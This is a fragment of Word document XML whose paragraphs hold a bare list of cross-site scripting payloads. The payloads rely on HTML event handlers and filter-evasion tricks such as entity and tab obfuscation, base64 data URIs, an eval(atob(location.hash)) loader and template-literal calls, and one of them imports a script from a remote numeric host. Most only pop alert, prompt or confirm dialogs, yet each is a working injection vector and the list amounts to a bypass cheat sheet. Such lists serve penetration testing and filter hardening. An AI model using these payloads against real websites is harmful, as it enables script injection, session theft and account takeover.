            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;base href=//0&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B25BBC1" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;script/src="data:&amp;comma;eval(atob(location.hash.slice(1)))//#alert(1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51A0D3F9" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;body onload=alert(1)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21F0D0C6" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;body onpageshow=alert(1)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E860330" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;body onfocus=alert(1)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6635184F" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;body onhashchange=alert(1)&gt;&lt;a href=#x&gt;click this!#x</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DF280AB" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;body style=overflow:auto;height:1000px onscroll=alert(1) id=x&gt;#x</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B3EDE29" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;body onscroll=alert(1)&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35DDB405" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;x id=x&gt;#x</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="154FF7AA" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;body onresize=alert(1)&gt;press F12!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37DCF20D" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;body onhelp=alert(1)&gt;press F1! (MSIE)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="323EA687" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;marquee onstart=alert(1)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28875FA9" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;marquee loop=1 width=0 onfinish=alert(1)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C6DAF55" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;audio src onloadstart=alert(1)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46EC4105" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;video onloadstart=alert(1)&gt;&lt;source&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70874171" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;input autofocus onblur=alert(1)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FE68A15" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;keygen autofocus onfocus=alert(1)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A4C0F30" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;form onsubmit=alert(1)&gt;&lt;input type=submit&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72EF69D1" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;select onchange=alert(1)&gt;&lt;option&gt;1&lt;option&gt;2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65BB7EC5" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;menu id=x contextmenu=x onshow=alert(1)&gt;right click me!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64FB318B" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;iframe/onload='this["src"]="javas&amp;Tab;cript:al"+"ert``"';&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13A88381" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;img/src=q onerror='new Function`al\ert\`1\``'&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42C9B5D1" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='&gt;&lt;/object&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F50F77B" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;svg onload\r\n=$.globalEval("al"+"ert()");&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7032FA61" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>[1].map(alert)   or    (alert)(1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EBC4D20" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;"&gt;&lt;details/open/ontoggle="jAvAsCrIpT&amp;colon;alert&amp;lpar;/xss-by-tarun/&amp;rpar;"&gt;XXXXX&lt;/a&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48E7C86C" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>[1].find(confirm)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F00C48D" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;svg/onload=self[`aler`%2b`t`]`1`&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B8155F3" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>%22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%3E%3C/object%3E</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BCB2785" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>'-[document.domain].map(alert)-'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BB7BD6F" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;a"/onclick=(confirm)()&gt;Click Here!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22EB13EF" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Dec: &lt;svg onload=prompt%26%230000000040document.domain)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F686BAD" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Hex: &lt;svg onload=prompt%26%23x000000028;document.domain)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53F799FF" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>xss'"&gt;&lt;iframe srcdoc='%26lt;script&gt;;prompt`${document.domain}`%26lt;/script&gt;'&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CDBB6C8" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;--`&lt;img/src=` onerror=confirm``&gt; --!&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74000D1D" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;a href="j&amp;Tab;a&amp;Tab;v&amp;Tab;asc&amp;NewLine;ri&amp;Tab;pt&amp;colon;&amp;lpar;a&amp;Tab;l&amp;Tab;e&amp;Tab;r&amp;Tab;t&amp;Tab;(document.domain)&amp;rpar;"&gt;X&lt;/a&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41041868" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;--`&lt;img/src=` onerror=confirm``&gt; --!&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="552925D2" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;--%253cimg%20onerror=alert(1)%20src=a%253e --!&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="269CD38A" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="696C1E56" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>javascript:{ alert`0` }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73D4B4D6" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>1'"&gt;&lt;img/src/onerror=.1|alert``&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="422A6FA7" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;img src=x onError=import('//1152848220/')&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="710A2186" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>%2sscript%2ualert()%2s/script%2u</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CB4F2F0" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;svg on onload=(alert)(document.domain)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34D8B256" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;style&gt;@keyframes a{}b{animation:a;}&lt;/style&gt;&lt;b/onanimationstart=prompt`${document.domain}&amp;#x60;&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="783E5C37" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B64950E" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;svg&gt;&lt;circle&gt;&lt;set onbegin=prompt(1) attributename=fill&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CB7034B" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x&gt;</w:t>
            </w:r>
          </w:p>
